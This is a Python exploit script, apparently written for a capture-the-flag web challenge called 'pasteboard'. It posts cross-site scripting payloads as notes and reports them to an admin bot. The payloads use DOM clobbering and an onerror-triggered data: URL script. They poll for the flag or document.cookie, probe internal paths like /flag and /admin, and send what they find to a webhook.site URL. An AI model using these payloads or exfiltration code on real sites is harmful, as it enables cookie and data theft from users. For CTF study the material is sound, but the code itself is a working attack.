#!/usr/bin/env python3
"""
Alternative approaches if CDP doesn't work
"""
import requests
import time
from urllib.parse import urljoin, quote

CHALLENGE_URL = "https://pasteboard-1fb68b7836775bea.chals.uoftctf.org"
WEBHOOK = "https://webhook.site/d8111fd3-599a-47ab-bcab-94d5ec54e078"


def send_payload(payload, title):
    response = requests.post(
        urljoin(CHALLENGE_URL, "/note/new"),
        data={"title": title, "body": payload},
        allow_redirects=False
    )

    if response.status_code == 302:
        note_path = response.headers.get('Location')
        print(f"✅ Paste created: {urljoin(CHALLENGE_URL, note_path)}")

        report_response = requests.post(
            urljoin(CHALLENGE_URL, "/report"),
            data={"url": note_path}
        )

        if report_response.status_code == 202:
            print(f"✅ Queued!\n")
            return True
    return False


print("🔄 Sending alternative exploitation payloads...\n")

# Payload 1: Navigate to chrome://inspect (might expose flag in UI)
code1 = "setTimeout(() => {window.location='chrome://inspect/%23pages'}, 100)"
payload1 = f'<form id="errorReporter"><input name="path" value="data:text/javascript,{quote(code1)}"></form><img id="renderConfig" src=x onerror="window.lastRenderError=\'x\';throw new Error()">'

print("1️⃣ Trying chrome://inspect navigation...")
send_payload(payload1, "chrome://inspect test")
time.sleep(3)

# Payload 2: Poll for flag appearing in window
code2 = f"""let attempts = 0;
const check = setInterval(() => {{
    attempts++;
    const flag = window.FLAG || window.flag || document.cookie;
    if (flag) {{
        fetch('{WEBHOOK}?flag=' + encodeURIComponent(flag));
        clearInterval(check);
    }}
    if (attempts > 20) {{
        fetch('{WEBHOOK}?error=no_flag_after_20_seconds');
        clearInterval(check);
    }}
}}, 1000);""".replace('\n', ' ')
payload2 = f'<form id="errorReporter"><input name="path" value="data:text/javascript,{quote(code2)}"></form><img id="renderConfig" src=x onerror="window.lastRenderError=\'x\';throw new Error()">'

print("2️⃣ Trying delayed flag polling...")
send_payload(payload2, "Flag polling")
time.sleep(3)

# Payload 3: Try fetching from various internal endpoints
code3 = f"""(async () => {{
    const endpoints = ['/flag', '/flag.txt', '/admin', '/secret', '/../flag.txt', '/static/flag.txt'];
    for (const ep of endpoints) {{
        try {{
            const r = await fetch(ep);
            if (r.ok) {{
                const text = await r.text();
                await fetch('{WEBHOOK}?endpoint=' + encodeURIComponent(ep) + '&data=' + encodeURIComponent(text.substring(0, 200)));
            }}
        }} catch(e) {{}}
    }}
}})();""".replace('\n', ' ')
payload3 = f'<form id="errorReporter"><input name="path" value="data:text/javascript,{quote(code3)}"></form><img id="renderConfig" src=x onerror="window.lastRenderError=\'x\';throw new Error()">'

print("3️⃣ Trying internal endpoints...")
send_payload(payload3, "Endpoint scan")

print("\n" + "="*80)
print("✅ All alternative payloads sent!")
print(f"📊 Check webhook: {WEBHOOK}")
print("="*80)